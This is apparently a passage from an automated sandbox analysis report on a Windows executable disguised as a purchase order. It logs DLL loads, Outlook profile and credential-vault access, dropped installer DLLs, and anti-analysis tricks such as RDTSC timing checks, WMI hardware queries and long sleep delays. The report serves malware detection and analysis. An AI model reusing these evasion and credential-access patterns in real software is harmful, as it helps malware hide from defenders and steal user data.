            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: PO 0309494059506060609696007.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2279273264.0000000004476000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 0_2_6E421B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6E421B5F
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_36253FC8 push 243660DAh; retf 4_2_36253FD5
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_3663057F push ebp; ret 4_2_3663058F
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeFile created: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\LangDLL.dllJump to dropped file
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeFile created: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeAPI/Special instruction interceptor: Address: 4AF3D1C
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeAPI/Special instruction interceptor: Address: 1E83D1C
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeRDTSC instruction interceptor: First address: 4AB2F0D second address: 4AB2F0D instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FCA9C7476A6h 0x00000006 inc ebp 0x00000007 test cl, al 0x00000009 inc ebx 0x0000000a cmp cl, al 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeRDTSC instruction interceptor: First address: 1E42F0D second address: 1E42F0D instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FCA9CB960D6h 0x00000006 inc ebp 0x00000007 test cl, al 0x00000009 inc ebx 0x0000000a cmp cl, al 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeMemory allocated: 33230000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeMemory allocated: 33060000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 599124Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 598249Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 597702Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 597227Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 596964Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 596749Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 596640Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 596531Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 596421Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 596312Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 596202Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 596093Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 595984Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 595874Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 595765Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 595656Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 595546Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 595437Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 595328Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 595217Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 595101Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 594984Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 594870Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 594765Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 594656Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 594546Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 594427Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 594296Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeWindow / User API: threadDelayed 1289Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeWindow / User API: threadDelayed 8567Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\LangDLL.dllJump to dropped file
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeAPI coverage: 1.7 %
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -28592453314249787s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 2708Thread sleep count: 1289 > 30Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 2708Thread sleep count: 8567 > 30Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -599671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -599124s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -599015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -598796s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -598578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -598468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -598249s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -598140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -598031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -597921s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -597812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -597702s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -597593s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -597484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -597374s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -597227s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -596964s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -596859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -596749s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -596640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -596531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -596421s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -596312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -596202s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -596093s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -595984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -595874s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -595765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -595656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -595546s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -595437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -595328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -595217s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -595101s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -594984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -594870s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -594765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -594656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -594546s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -594427s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exe TID: 4312Thread sleep time: -594296s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059CC
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_00402868 FindFirstFileW,4_2_00402868
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_004059CC
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_004065FD FindFirstFileW,FindClose,4_2_004065FD
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 599124Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 598249Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeThread delayed: delay time: 597702Jump to behavior
